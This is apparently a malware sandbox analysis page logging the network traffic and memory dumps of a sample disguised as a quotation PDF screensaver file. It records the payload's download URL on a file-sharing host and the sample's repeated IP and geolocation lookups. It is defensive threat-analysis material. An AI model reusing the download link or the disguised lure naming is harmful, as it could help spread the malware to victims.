    GET http://filetransfer.io/data-package/O7tfWEfj/download

    HTTP Response

    301
  • 104.21.13.139:443
    https://filetransfer.io/data-package/O7tfWEfj/download
    tls, http
    QUOTATION_NOVQTRA071244PDF.scr
    788 B
     4.8kB
     9
    10

    HTTP Request

    GET https://filetransfer.io/data-package/O7tfWEfj/download

    HTTP Response

    302
  • 104.21.13.139:443
    https://s23.filetransfer.io/storage/download/FkXcFOVglHQY
    tls, http
    QUOTATION_NOVQTRA071244PDF.scr
    31.8kB
     1.1MB
     604
    815

    HTTP Request

    GET https://s23.filetransfer.io/storage/download/FkXcFOVglHQY

    HTTP Response

    200
  • 193.122.6.168:80
    http://checkip.dyndns.org/
    http
    aspnet_compiler.exe
    2.2kB
     4.1kB
     23
    14

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200
  • 104.21.67.152:443
    https://reallyfreegeoip.org/xml/138.199.29.44
    tls, http
    aspnet_compiler.exe
    2.4kB
     17.6kB
     30
    31

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/138.199.29.44

    HTTP Response

    200
  • 8.8.8.8:53
    filetransfer.io
    dns
    QUOTATION_NOVQTRA071244PDF.scr
    61 B
     93 B
     1
    1

    DNS Request

    filetransfer.io

    DNS Response

    104.21.13.139
    172.67.200.96

  • 8.8.8.8:53
    s23.filetransfer.io
    dns
    QUOTATION_NOVQTRA071244PDF.scr
    65 B
     97 B
     1
    1

    DNS Request

    s23.filetransfer.io

    DNS Response

    104.21.13.139
    172.67.200.96

  • 8.8.8.8:53
    checkip.dyndns.org
    dns
    aspnet_compiler.exe
    64 B
     176 B
     1
    1

    DNS Request

    checkip.dyndns.org

    DNS Response

    193.122.6.168
    158.101.44.242
    193.122.130.0
    132.226.8.169
    132.226.247.73

  • 8.8.8.8:53
    reallyfreegeoip.org
    dns
    aspnet_compiler.exe
    65 B
     97 B
     1
    1

    DNS Request

    reallyfreegeoip.org

    DNS Response

    104.21.67.152
    172.67.177.134

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2636-0-0x000007FEF5FA3000-0x000007FEF5FA4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2636-1-0x0000000000290000-0x00000000002C0000-memory.dmp

    Filesize

    192KB

    Download

  • memory/2636-2-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2636-3-0x000000001C760000-0x000000001C868000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-4-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-5-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-7-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-19-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-21-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-33-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-36-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-49-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-67-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-9-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-11-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-13-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-15-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-17-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-65-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-1079-0x0000000002470000-0x00000000024BC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2636-1078-0x000000001BCF0000-0x000000001BD6A000-memory.dmp

    Filesize

    488KB

    Download

  • memory/2636-63-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-61-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-1080-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2636-1081-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2636-59-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-57-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-55-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-53-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-51-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-47-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-45-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-43-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-41-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-39-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-37-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-31-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-29-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-27-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-25-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-23-0x000000001C760000-0x000000001C862000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2636-1082-0x000007FEF5FA3000-0x000007FEF5FA4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2636-1083-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2636-1084-0x000000001BC00000-0x000000001BC54000-memory.dmp

    Filesize

    336KB

    Download

  • memory/2636-1087-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/4856-1086-0x0000000000470000-0x0000000000498000-memory.dmp

    Filesize

    160KB

    Download

  • memory/4856-1088-0x000007FEF5FA3000-0x000007FEF5FA4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4856-1089-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/4856-1090-0x0000000000AC0000-0x0000000000AE4000-memory.dmp

    Filesize

    144KB

    Download

  • memory/4856-1091-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/4856-1092-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/4856-1093-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/4856-1094-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

    Filesize

    9.9MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.